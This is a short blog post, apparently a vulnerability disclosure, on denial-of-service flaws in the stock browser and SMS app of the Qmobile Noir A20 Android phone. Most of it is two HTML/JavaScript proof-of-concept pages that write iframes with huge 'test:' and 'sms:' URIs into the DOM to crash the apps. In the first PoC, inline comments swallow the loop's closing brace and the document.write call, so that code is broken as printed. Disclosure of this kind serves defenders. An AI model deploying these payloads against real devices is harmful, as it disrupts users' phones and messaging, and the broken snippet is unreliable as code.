Latest News

Android Browser + Messaging App DOS


While being impressed by Collin Mulliner's research on smart phones, I found myself very curious trying to find vulnerabilities inside it and i found several ones out. In this short blog post I would be discussing about DOS vulnerabilities inside the default browser and the messaging app of Qmobile Noir A20. Qmobile Noir A20 runs on Android 4.1.2. The flaw itself is present it inside pre kitkat browsers as well as the default messaging system, however since most of the Qmobile smartphones within the released with or slightly after Noir A20 are most likely using the same browser version and messaging app.

Android Browser DOS

The vulnerability is a simply Denial of service issue due to the writing overly long strings of iframes to the DOM.

Here is the POC:

<html>
<head>
<title>Android Browser DOS</title>
 <body>
 <script>
  frame = "<iframe src=\"test:";
  for (i = 0; i < 100000; i++) {
      frame = frame + "0000000000000000000000000000000000"; // Long string of Numbers  }
 frame = frame + "\" width=125 height=125></iframe>"; // Appending the resultant of the loop to closing tag.  document.write(frame); // Writing the value of frame to DOM
  </script>
  </body>
  </html>

Messaging App DOS

A sms protocol provides text messaging component for all smartphones, During my tests, I concluded that the default messaging app for Qmobile Noir A20 is not able to handle long strings sent via sms:// protocol. Please note that this is partly recoverable DOS, and also the exact conditions for DOS are not yet known.

Here is the POC:

  <html>
  <title>Android Browser SMS Protocol Denial Of Service</title>
  <body>
  <script>
  frame = "<iframe src=\"sms:";
  for (i = 0; i < 30000; i++) {
          frame = frame + "+12345678912222222222222";
  }
 frame = frame + "\" </iframe><iframe src='sms:+1234567891212121222222222'></iframe>";
 document.write(frame);
  </script>
  </body>
  </html>

References
  • http://mulliner.org/security/advisories/iphone_safari_phone-auto-dial_vulnerability_advisory.txt
  • https://www.ietf.org/rfc/rfc5724.txt

No comments:

Post a Comment

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code